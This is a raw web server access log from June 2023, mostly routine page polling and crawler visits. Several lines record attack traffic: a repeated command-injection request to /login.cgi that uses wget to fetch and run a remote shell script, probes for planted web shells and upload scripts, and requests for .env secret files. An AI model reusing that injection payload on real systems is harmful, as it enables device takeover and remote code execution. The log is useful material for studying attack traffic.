178.115.41.55 - - [04/Jun/2023:19:18:16 +0200] "GET /entry.php?id=10271&&ser=899035 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:18:16 +0200] "GET /gui/javascript/form_form.js?1685899096 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899035" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:19:17 +0200] "GET /entry.php?id=10271&&ser=899096 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899035" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:19:17 +0200] "GET /gui/javascript/form_form.js?1685899157 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899096" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:20:18 +0200] "GET /entry.php?id=10271&&ser=899157 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=899096" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:20:18 +0200] "GET /gui/javascript/form_form.js?1685899218 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899157" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:21:19 +0200] "GET /entry.php?id=10271&&ser=899218 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899157" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:21:19 +0200] "GET /gui/javascript/form_form.js?1685899279 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899218" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:22:20 +0200] "GET /entry.php?id=10271&&ser=899279 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899218" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:22:20 +0200] "GET /gui/javascript/form_form.js?1685899340 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899279" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:23:21 +0200] "GET /entry.php?id=10271&&ser=899340 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=899279" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:23:21 +0200] "GET /gui/javascript/form_form.js?1685899401 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899340" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:24:22 +0200] "GET /entry.php?id=10271&&ser=899401 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899340" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:24:22 +0200] "GET /gui/javascript/form_form.js?1685899462 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899401" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:25:23 +0200] "GET /entry.php?id=10271&&ser=899462 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899401" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:25:23 +0200] "GET /gui/javascript/form_form.js?1685899523 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899462" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:26:24 +0200] "GET /entry.php?id=10271&&ser=899523 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899462" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:26:24 +0200] "GET /gui/javascript/form_form.js?1685899584 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899523" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:27:25 +0200] "GET /entry.php?id=10271&&ser=899584 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899523" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:27:25 +0200] "GET /gui/javascript/form_form.js?1685899645 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899584" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:28:26 +0200] "GET /entry.php?id=10271&&ser=899645 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899584" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:28:26 +0200] "GET /gui/javascript/form_form.js?1685899706 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899645" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:29:27 +0200] "GET /entry.php?id=10271&&ser=899706 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899645" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:29:27 +0200] "GET /gui/javascript/form_form.js?1685899767 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899706" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:30:28 +0200] "GET /entry.php?id=10271&&ser=899767 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899706" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:30:28 +0200] "GET /gui/javascript/form_form.js?1685899828 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899767" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:31:29 +0200] "GET /entry.php?id=10271&&ser=899828 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899767" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:31:29 +0200] "GET /gui/javascript/form_form.js?1685899889 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:32:30 +0200] "GET /entry.php?id=10271&&ser=899889 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:32:30 +0200] "GET /gui/javascript/form_form.js?1685899950 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:33:31 +0200] "GET /entry.php?id=10271&&ser=899950 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=899889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:33:31 +0200] "GET /gui/javascript/form_form.js?1685900011 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899950" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:34:32 +0200] "GET /entry.php?id=10271&&ser=900011 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899950" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:34:32 +0200] "GET /gui/javascript/form_form.js?1685900072 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900011" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:35:33 +0200] "GET /entry.php?id=10271&&ser=900072 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900011" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:35:33 +0200] "GET /gui/javascript/form_form.js?1685900133 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900072" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:36:34 +0200] "GET /entry.php?id=10271&&ser=900133 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900072" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:36:34 +0200] "GET /gui/javascript/form_form.js?1685900194 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900133" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:37:35 +0200] "GET /entry.php?id=10271&&ser=900194 HTTP/1.1" 200 985 "http://hausegger.activities.at/entry.php?id=10271&&ser=900133" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:37:35 +0200] "GET /gui/javascript/form_form.js?1685900255 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900194" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:38:36 +0200] "GET /entry.php?id=10271&&ser=900255 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900194" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:38:36 +0200] "GET /gui/javascript/form_form.js?1685900316 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900255" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:39:37 +0200] "GET /entry.php?id=10271&&ser=900316 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900255" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:39:37 +0200] "GET /gui/javascript/form_form.js?1685900377 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900316" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:40:38 +0200] "GET /entry.php?id=10271&&ser=900377 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900316" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:40:38 +0200] "GET /gui/javascript/form_form.js?1685900438 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900377" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:41:39 +0200] "GET /entry.php?id=10271&&ser=900438 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900377" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:41:39 +0200] "GET /gui/javascript/form_form.js?1685900499 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900438" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:42:40 +0200] "GET /entry.php?id=10271&&ser=900499 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900438" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:42:40 +0200] "GET /gui/javascript/form_form.js?1685900560 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900499" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
185.150.166.250 - - [04/Jun/2023:19:43:09 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you"
178.115.41.55 - - [04/Jun/2023:19:43:41 +0200] "GET /entry.php?id=10271&&ser=900560 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900499" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:43:41 +0200] "GET /gui/javascript/form_form.js?1685900621 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900560" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:44:42 +0200] "GET /entry.php?id=10271&&ser=900621 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900560" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:44:42 +0200] "GET /gui/javascript/form_form.js?1685900682 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900621" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:45:36 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1878 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:45:36 +0200] "GET /gui/javascript/form_form.js?1685900736 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:45:38 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2432 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:45:38 +0200] "GET /gui/javascript/form_form.js?1685900738 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:45:39 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:45:39 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1911 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:45:39 +0200] "GET /gui/javascript/form_form.js?1685900739 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
109.205.213.39 - - [04/Jun/2023:19:55:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you"
198.199.102.221 - - [04/Jun/2023:20:03:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
20.187.94.76 - - [04/Jun/2023:20:07:37 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:07:46 +0200] "GET /up.php HTTP/1.1" 404 289 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:07:49 +0200] "GET /upload.php HTTP/1.1" 404 292 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:07:51 +0200] "GET /wp-content/uploads/ HTTP/1.1" 404 298 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:07:53 +0200] "GET /wp-content/uploads/2023/06/ HTTP/1.1" 404 305 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:07:54 +0200] "GET /shell.php HTTP/1.1" 404 291 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:07:55 +0200] "GET /wp-admin/network/wp-footer.php HTTP/1.1" 404 305 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:07:56 +0200] "GET /wp-info.php HTTP/1.1" 404 293 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:07:57 +0200] "GET /wp-content/vuln.php HTTP/1.1" 404 298 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:07:59 +0200] "GET /upel.php HTTP/1.1" 404 290 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:08:01 +0200] "GET /wp-content/plugins/ppus/up.php HTTP/1.1" 404 306 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:08:02 +0200] "GET /098.php HTTP/1.1" 404 291 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:08:03 +0200] "GET /V5.php HTTP/1.1" 404 290 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:08:06 +0200] "GET /new_license.php HTTP/1.1" 404 295 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:08:08 +0200] "GET /wp-content/plugins/theme-configurator/mini.php HTTP/1.1" 404 316 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:08:09 +0200] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 404 314 "-" "python-requests/2.27.1"
94.102.61.10 - - [04/Jun/2023:20:09:22 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
20.187.94.76 - - [04/Jun/2023:20:09:58 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:01 +0200] "GET /up.php HTTP/1.1" 404 293 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:03 +0200] "GET /upload.php HTTP/1.1" 404 295 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:06 +0200] "GET /wp-content/uploads/ HTTP/1.1" 404 301 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:08 +0200] "GET /wp-content/uploads/2023/06/ HTTP/1.1" 404 308 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:09 +0200] "GET /shell.php HTTP/1.1" 404 294 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:11 +0200] "GET /wp-admin/network/wp-footer.php HTTP/1.1" 404 308 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:12 +0200] "GET /wp-info.php HTTP/1.1" 404 297 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:14 +0200] "GET /wp-content/vuln.php HTTP/1.1" 404 302 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:17 +0200] "GET /upel.php HTTP/1.1" 404 294 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:19 +0200] "GET /wp-content/plugins/ppus/up.php HTTP/1.1" 404 309 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:21 +0200] "GET /098.php HTTP/1.1" 404 294 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:22 +0200] "GET /V5.php HTTP/1.1" 404 293 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:24 +0200] "GET /new_license.php HTTP/1.1" 404 298 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:26 +0200] "GET /wp-content/plugins/theme-configurator/mini.php HTTP/1.1" 404 319 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:20:10:29 +0200] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
154.209.125.73 - - [04/Jun/2023:20:21:16 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.102.39.91 - - [04/Jun/2023:20:26:46 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0"
109.237.97.180 - - [04/Jun/2023:20:28:58 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [04/Jun/2023:20:28:58 +0200] "\x16\x03\x01\x01H\x01" 400 383 "-" "-"
185.224.128.122 - - [04/Jun/2023:20:31:59 +0200] "GET / HTTP/1.0" 200 423 "-" "nvdorz"
205.210.31.226 - - [04/Jun/2023:22:36:12 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
52.162.218.19 - - [04/Jun/2023:22:42:04 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [04/Jun/2023:22:42:05 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.205.213.39 - - [04/Jun/2023:23:36:46 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you"
198.235.24.103 - - [04/Jun/2023:23:58:01 +0200] "\x16\x03\x01" 400 383 "-" "-"
109.205.213.109 - - [05/Jun/2023:00:14:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you"
66.249.64.248 - - [05/Jun/2023:00:29:22 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.252 - - [05/Jun/2023:00:29:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.248 - - [05/Jun/2023:00:44:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.167.12.38 - - [05/Jun/2023:01:14:16 +0200] "HEAD /wordpress HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
69.167.12.38 - - [05/Jun/2023:01:14:17 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
